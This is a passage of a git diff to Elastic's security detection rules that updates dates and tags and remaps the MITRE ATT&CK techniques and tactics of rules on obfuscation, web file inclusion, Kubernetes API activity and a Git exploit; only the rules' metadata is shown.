a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml +++ b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,22 +77,23 @@ ROT encoding, a simple letter substitution cipher, is often used to obfuscate Py [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.013" name = "Encrypted/Encoded File" reference = "https://attack.mitre.org/techniques/T1027/013/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml index 812702a98d9..a7df32f5e59 100644 --- a/rules/cross-platform/defense_evasion_genai_config_modification.toml +++ b/rules/cross-platform/defense_evasion_genai_config_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,17 +56,7 @@ references = [ risk_score = 47 rule_id = "590fc62d-7386-4c75-92b0-af4517018da1" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Domain: LLM", -] +tags = ["Domain: Endpoint", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM"] timestamp_override = "event.ingested" type = "new_terms" @@ -104,29 +94,21 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml index 20e0c1c6df0..7a5756a489d 100644 --- a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml +++ b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "auditd_manager"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,23 +58,7 @@ references = [ risk_score = 47 rule_id = "b2c3d4e5-f6a7-8901-bcde-f123456789ab" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Auditd Manager", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Domain: LLM", - "Mitre Atlas: T0053", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Resource Development", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Auditd Manager", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0053"] timestamp_override = "event.ingested" type = "eql" @@ -140,19 +124,18 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.004" -name = "Compile After Delivery" -reference = "https://attack.mitre.org/techniques/T1027/004/" +[[rule.threat.technique]] +id = "T1587" +name = "Develop Capabilities" +reference = "https://attack.mitre.org/techniques/T1587/" +[[rule.threat.technique.subtechnique]] +id = "T1587.001" +name = "Malware" +reference = "https://attack.mitre.org/techniques/T1587/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml index 1f8053d9767..ec1658731b2 100644 --- a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml +++ b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,22 +60,7 @@ references = [ risk_score = 47 rule_id = "c3d4e5f6-a7b8-9012-cdef-123456789abc" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Domain: LLM", - "Mitre Atlas: T0086", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0086"] timestamp_override = "event.ingested" type = "eql" @@ -159,14 +144,39 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml index 4b53205e011..a7a04ddf251 100644 --- a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml +++ b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,15 +58,7 @@ references = ["https://attack.mitre.org/techniques/T1562/001/"] risk_score = 73 rule_id = "fc552f49-8f1c-409b-90f8-6f5b9869b6c4" severity = "high" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -78,38 +70,18 @@ sequence by host.id with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml index 31b65ceebca..74cb039c6db 100644 --- a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml +++ b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/30" integration = ["endpoint", "system", "windows", "auditd_manager", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -71,16 +71,7 @@ mean time to respond (MTTR). risk_score = 47 rule_id = "5a876e0d-d39a-49b9-8ad8-19c9b622203b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "OS: macOS", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -96,35 +87,18 @@ FROM logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml index c6e250f6b81..4d1929a052b 100644 --- a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml +++ b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -34,15 +34,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -89,14 +81,36 @@ Virtual machine fingerprinting involves identifying virtualized environments by [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml index 2f85b8138b9..62546661360 100644 --- a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml @@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,17 +52,7 @@ This rule surfaces successful GET requests containing directory traversal or dir risk_score = 21 rule_id = "90e4ceab-79a5-4f8e-879b-513cac7fcad9" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Resources: Investigation Guide", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -164,11 +154,24 @@ from framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml index 8ea0b32ead0..4db561f9f8f 100644 --- a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml @@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,18 +53,7 @@ This rule identifies successful GET requests that pass a remote URL or raw IP in risk_score = 21 rule_id = "45d099b4-a12e-4913-951c-0129f73efb41" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Command and Control", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Resources: Investigation Guide", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -117,19 +106,11 @@ from framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml index 8934cb47811..7b5a138dd69 100644 --- a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml +++ b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/23" integration = ["aws", "endpoint"] maturity = "production" -updated_date = "2025/11/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,22 +77,7 @@ references = [ risk_score = 47 rule_id = "a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudTrail", - "Data Source: AWS EC2", - "Data Source: AWS SSM", - "Data Source: AWS Systems Manager", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS EC2", "Data Source: AWS SSM", "Data Source: AWS Systems Manager", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -225,26 +210,23 @@ FROM logs-aws.cloudtrail*, logs-endpoint.events.process-* METADATA _id, _version [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1651" name = "Cloud Administration Command" reference = "https://attack.mitre.org/techniques/T1651/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml index 13d278cd24c..539d57092b7 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,17 +66,7 @@ This detection links an interactive invocation of common networking utilities or risk_score = 47 rule_id = "9d312839-339a-4e10-af2e-a49b15b15d13" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Data Source: Kubernetes", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,24 +101,6 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml index 211a1183c0f..aed9622e71e 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,17 +68,7 @@ This rule correlates an interactive command execution inside a container with a risk_score = 47 rule_id = "5d1c962d-5d2a-48d4-bdcf-e980e3914947" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Data Source: Kubernetes", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,24 +105,6 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml index 652be9cb05b..834d2e997a9 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -136,22 +136,9 @@ sequence with maxspan=1s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [[rule.threat.technique]] id = "T1613" @@ -162,3 +149,16 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml index 95229fe817d..82698e80fea 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,18 +65,7 @@ This rule correlates interactive access to a pod’s service account token or CA risk_score = 47 rule_id = "4bd306f9-ee89-4083-91af-e61ed5c42b9a" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Data Source: Kubernetes", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Credential Access", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -90,24 +79,6 @@ sequence with maxspan=60s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" @@ -127,11 +98,16 @@ reference = "https://attack.mitre.org/tactics/TA0006/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml index 0074a431b39..8370e42b986 100644 --- a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml +++ b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/12" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/11/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,12 +88,22 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = 